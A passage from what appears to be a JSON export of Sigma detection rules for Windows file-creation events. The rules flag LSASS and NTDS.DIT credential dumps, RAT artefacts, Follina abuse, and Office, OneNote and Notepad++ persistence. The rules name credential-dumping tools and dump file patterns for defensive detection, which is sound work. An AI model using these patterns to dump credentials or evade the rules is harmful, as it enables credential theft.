https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-15\nmodified: 2024-10-08\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_1:\n        TargetFilename|endswith:\n            - '\\Andrew.dmp'\n            - '\\Coredump.dmp'\n            - '\\lsass.dmp'\n            - '\\lsass.rar'\n            - '\\lsass.zip'\n            - '\\NotLSASS.zip'  # https://github.com/CCob/MirrorDump\n            - '\\PPLBlade.dmp'  # https://github.com/tastypepperoni/PPLBlade\n            - '\\rustive.dmp' # https://github.com/safedv/RustiveDump/blob/main/src/main.rs#L35\n    selection_2:\n        TargetFilename|contains:\n            - '\\lsass_2'  # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp\n            - '\\lsassdmp'\n            - '\\lsassdump'\n    selection_3:\n        TargetFilename|contains|all:\n            - '\\lsass'\n            - '.dmp'\n    selection_4:\n        TargetFilename|contains: 'SQLDmpr'\n        TargetFilename|endswith: '.mdmp'\n    selection_5:\n        TargetFilename|contains:\n            - '\\nanodump'\n            - '\\proc_' # NativeDump pattern https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258\n        TargetFilename|endswith: '.dmp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml",
    "content": "title: LSASS Process Dump Artefact In CrashDumps Folder\nid: 6902955a-01b7-432c-b32a-6f5f81d8f625\nstatus: test\ndescription: Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash'\ndate: 2022-12-08\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\'\n        TargetFilename|contains: 'lsass.exe.'\n        TargetFilename|endswith: '.dmp'\n    condition: selection\nfalsepositives:\n    - Rare legitimate dump of the process by the operating system due to a crash of lsass\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml",
    "content": "title: WerFault LSASS Process Memory Dump\nid: c3e76af5-4ce0-4a14-9c9a-25ceb8fda182\nstatus: test\ndescription: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials\nreferences:\n    - https://github.com/helpsystems/nanodump\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: C:\\WINDOWS\\system32\\WerFault.exe\n        TargetFilename|contains:\n            - '\\lsass'\n            - 'lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mal_adwind.yml",
    "content": "title: Adwind RAT / JRAT File Artifact\nid: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1\nrelated:\n    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71\n      type: derived\nstatus: test\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017-11-10\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|contains|all:\n              - '\\AppData\\Roaming\\Oracle\\bin\\java'\n              - '.exe'\n        - TargetFilename|contains|all:\n              - '\\Retrive'\n              - '.vbs'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml",
    "content": "title: Octopus Scanner Malware\nid: 805c55d9-31e6-4846-9878-c34c75054fe9\nstatus: test\ndescription: Detects Octopus Scanner Malware.\nreferences:\n    - https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain\nauthor: NVISO\ndate: 2020-06-09\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1195\n    - attack.t1195.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Microsoft\\Cache134.dat'\n            - '\\AppData\\Local\\Microsoft\\ExplorerSync.db'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml",
    "content": "title: File Creation In Suspicious Directory By Msdt.EXE\nid: 318557a5-150c-4c8d-b70e-a9910e199857\nstatus: test\ndescription: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities\nreferences:\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\n    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nauthor: Vadim Varganov, Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2023-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - cve.2022-30190\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        TargetFilename|contains:\n            - '\\Desktop\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\PerfLogs\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml",
    "content": "title: Uncommon File Creation By Mysql Daemon Process\nid: c61daa90-3c1e-4f18-af62-8f288b5c9aaf\nstatus: test\ndescription: |\n    Detects the creation of files with scripting or executable extensions by the Mysql daemon,\n    which could be an indicator of \"User Defined Functions\" abuse to download malware.\nreferences:\n    - https://asec.ahnlab.com/en/58878/\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/\nauthor: Joseph Kamau\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - \\mysqld.exe\n            - \\mysqld-nt.exe\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dat'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.psm1'\n            - '.vbe'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_net_cli_artefact.yml",
    "content": "title: Suspicious DotNET CLR Usage Log Artifact\nid: e0b06658-7d1d-4cd3-bf15-03467507ff7c\nrelated:\n    - id: 4508a70e-97ef-4300-b62b-ff27992990ea\n      type: derived\n    - id: e4b63079-6198-405c-abd7-3fe8b0ce3263\n      type: obsolete\nstatus: test\ndescription: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.\nreferences:\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\n    - https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml\n    - https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\nauthor: frack113, omkar72, oscd.community, Wojciech Lesicki\ndate: 2022-11-18\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: UsageLogs folder must be monitored by the sysmon configuration'\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\UsageLogs\\cmstp.exe.log'\n            - '\\UsageLogs\\cscript.exe.log'\n            - '\\UsageLogs\\mshta.exe.log'\n            - '\\UsageLogs\\msxsl.exe.log'\n            - '\\UsageLogs\\regsvr32.exe.log'\n            - '\\UsageLogs\\rundll32.exe.log'\n            - '\\UsageLogs\\svchost.exe.log'\n            - '\\UsageLogs\\wscript.exe.log'\n            - '\\UsageLogs\\wmic.exe.log'\n    filter_main_rundll32:\n        # This filter requires the event to be enriched by additional information such as ParentImage and CommandLine activity\n        ParentImage|endswith: '\\MsiExec.exe'\n        ParentCommandLine|contains: ' -Embedding'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains|all:\n            - 'Temp'\n            - 'zzzzInvokeManagedCustomActionOutOfProc'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml",
    "content": "title: Suspicious File Creation In Uncommon AppData Folder\nid: d7b50671-d1ad-4871-aa60-5aa5b331fe04\nstatus: test\ndescription: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Roaming, LocalLow). This method could be used to bypass detections that exclude the AppData folder for fear of FPs\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\'\n        TargetFilename|endswith:\n            # Add more as needed\n            - '.bat'\n            - '.cmd'\n            - '.cpl'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.lnk'\n            - '.msi'\n            - '.ps1'\n            - '.psm1'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n    filter_main:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains:\n            - '\\AppData\\Local\\'\n            - '\\AppData\\LocalLow\\'\n            - '\\AppData\\Roaming\\'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_new_scr_file.yml",
    "content": "title: SCR File Write Event\nid: c048f047-7e2a-4888-b302-55f509d4a91d\nstatus: test\ndescription: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Desk/\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'\ndate: 2022-04-27\nmodified: 2023-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.scr'\n    filter:\n        TargetFilename|contains:\n            - ':\\$WINDOWS.~BT\\NewOS\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n            - ':\\WUDownloadCache\\' # Windows Update Download Cache\n    condition: selection and not filter\nfalsepositives:\n    - The installation of new screen savers by third party software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml",
    "content": "title: Potential Persistence Via Notepad++ Plugins\nid: 54127bd4-f541-4ac3-afdb-ea073f63f692\nstatus: test\ndescription: Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\", which could indicate possible persistence\nreferences:\n    - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2025-09-01\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Notepad++\\plugins\\'\n        TargetFilename|endswith: '.dll'\n    filter_gup:\n        Image|endswith: '\\Notepad++\\updater\\gup.exe'\n    filter_install:\n        # This filter is for Sigma dataset you could remove it or change when using the rule in your own env\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith:\n            - '\\target.exe'\n            - 'Installer.x64.exe'\n    filter_main_installer:\n        Image|contains: '\\npp.'\n        Image|endswith: '.exe'\n        TargetFilename:\n            - 'C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Possible FPs during first installation of Notepad++\n    - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml",
    "content": "title: NTDS.DIT Created\nid: 0b8baa3f-575c-46ee-8715-d6f28cc7d33c\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database)\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'ntds.dit'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml",
    "content": "title: NTDS.DIT Creation By Uncommon Parent Process\nid: 4e7050dd-e548-483f-b7d6-527ab4fa784d\nrelated:\n    - id: 11b1ed55-154d-4e82-8ad7-83739298f720\n      type: similar\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory\nreferences:\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://pentestlab.blog/tag/ntds-dit/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\n    definition: 'Requirements: The \"ParentImage\" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data'\ndetection:\n    selection_file:\n        TargetFilename|endswith: '\\ntds.dit'\n    selection_process_parent:\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\w3wp.exe'\n            - '\\wscript.exe'\n    selection_process_parent_path:\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        ParentImage|contains:\n            - '\\apache'\n            - '\\tomcat'\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Public\\'\n            - '\\PerfLogs\\'\n    condition: selection_file and 1 of selection_process_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml",
    "content": "title: NTDS.DIT Creation By Uncommon Process\nid: 11b1ed55-154d-4e82-8ad7-83739298f720\nrelated:\n    - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d\n      type: similar\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory\nreferences:\n    - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/\n    - https://adsecurity.org/?p=2398\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2022-07-14\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_ntds:\n        TargetFilename|endswith: '\\ntds.dit'\n    selection_process_img:\n        Image|endswith:\n            # Add more suspicious processes as you see fit\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            - '\\wt.exe'\n    selection_process_paths:\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Public\\'\n            - '\\PerfLogs\\'\n    condition: selection_ntds and 1 of selection_process_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml",
    "content": "title: NTDS Exfiltration Filename Patterns\nid: 3a8da4e0-36c1-40d2-8b29-b3e890d5172a\nstatus: test\ndescription: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1\n    - https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\All.cab' # https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1\n            - '.ntds.cleartext' # https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_addin_persistence.yml",
    "content": "title: Potential Persistence Via Microsoft Office Add-In\nid: 8e1cb247-6cf6-42fa-b440-3f27d57e9936\nstatus: test\ndescription: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).\nreferences:\n    - Internal Research\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\n    - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md\nauthor: NVISO\ndate: 2020-05-11\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_wlldropped:\n        TargetFilename|contains: '\\Microsoft\\Word\\Startup\\'\n        TargetFilename|endswith: '.wll'\n    selection_xlldropped:\n        TargetFilename|contains: '\\Microsoft\\Excel\\Startup\\'\n        TargetFilename|endswith: '.xll'\n    selection_xladropped:\n        TargetFilename|contains: 'Microsoft\\Excel\\XLSTART\\'\n        TargetFilename|endswith: '.xlam'\n    selection_generic:\n        TargetFilename|contains: '\\Microsoft\\Addins\\'\n        TargetFilename|endswith:\n            - '.xlam'\n            - '.xla'\n            - '.ppam'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate add-ins\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_created.yml",
    "content": "title: Office Macro File Creation\nid: 91174a41-dc8f-401b-be89-7bfc140612a0\nrelated:\n    - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66\n      type: similar\nstatus: test\ndescription: Detects the creation of new Office macro files on the system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.docm'\n            - '.dotm'\n            - '.xlsm'\n            - '.xltm'\n            - '.potm'\n            - '.pptm'\n    condition: selection\nfalsepositives:\n    - Very common in environments that rely heavily on macro documents\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml",
    "content": "title: Office Macro File Download\nid: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66\nrelated:\n    - id: 91174a41-dc8f-401b-be89-7bfc140612a0\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of new Office macro files on the system via an application (browser, mail client).\n    This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\nmodified: 2025-10-29\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_processes:\n        Image|endswith:\n            # Email clients\n            - '\\RuntimeBroker.exe' # Windows Email clients uses RuntimeBroker to create the files\n            - '\\outlook.exe'\n            - '\\thunderbird.exe'\n            # Browsers\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\maxthon.exe'\n            - '\\MicrosoftEdge.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\opera.exe'\n            - '\\safari.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n    selection_ext:\n        - TargetFilename|endswith:\n              - '.docm'\n              - '.dotm'\n              - '.xlsm'\n              - '.xltm'\n              - '.potm'\n              - '.pptm'\n        - TargetFilename|contains:\n              - '.docm:Zone'\n              - '.dotm:Zone'\n              - '.xlsm:Zone'\n              - '.xltm:Zone'\n              - '.potm:Zone'\n              - '.pptm:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate macro files downloaded from the internet\n    - Legitimate macro files sent as attachments via emails\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml",
    "content": "title: Office Macro File Creation From Suspicious Process\nid: b1c50487-1967-4315-a026-6491686d860e\nstatus: test\ndescription: Detects the creation of an Office macro file from a suspicious process\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\nmodified: 2023-02-22\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: The \"ParentImage\" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data'\ndetection:\n    selection_cmd:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.docm'\n            - '.dotm'\n            - '.xlsm'\n            - '.xltm'\n            - '.potm'\n            - '.pptm'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml",
    "content": "title: OneNote Attachment File Dropped In Suspicious Location\nid: 7fd164ba-126a-4d9c-9392-0d4f7c243df0\nstatus: test\ndescription: Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-09-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            # Note: add more common locations for drops such as download folders and the like. Or baseline legitimate locations and alert on everything else\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - ':\\Temp\\'\n        TargetFilename|endswith:\n            - '.one'\n            - '.onepkg'\n    filter_main_onenote:\n        Image|contains: ':\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\ONENOTE.EXE'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage of \".one\" or \".onepkg\" files from those locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml",
    "content": "title: Suspicious File Created Via OneNote Application\nid: fcc6d700-68d9-4241-9a1a-06874d621b06\nstatus: test\ndescription: Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\n    - https://twitter.com/MaD_c4t/status/1623414582382567424\n    - https://labs.withsecure.com/publications/detecting-onenote-abuse\n    - https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/\n    - https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-09\nmodified: 2023-02-27\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\onenote.exe'\n            - '\\onenotem.exe'\n            - '\\onenoteim.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\OneNote\\'\n        TargetFilename|endswith:\n            # TODO: Add more suspicious extensions\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.htm'\n            - '.html'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.\n    - Occasional FPs might occur if OneNote is used internally to share different embedded documents\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml",
    "content": "title: New Outlook Macro Created\nid: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61\nrelated:\n    - id: 117d3d3a-755c-4a61-b23e-9171146d094c\n      type: derived\nstatus: test\ndescription: Detects the creation of a macro file for Outlook.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\nauthor: '@ScoubiMtl'\ndate: 2021-04-05\nmodified: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        TargetFilename|endswith: '\\Microsoft\\Outlook\\VbaProject.OTM'\n    condition: selection\nfalsepositives:\n    - User genuinely creates a VB Macro for their email\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_newform.yml",
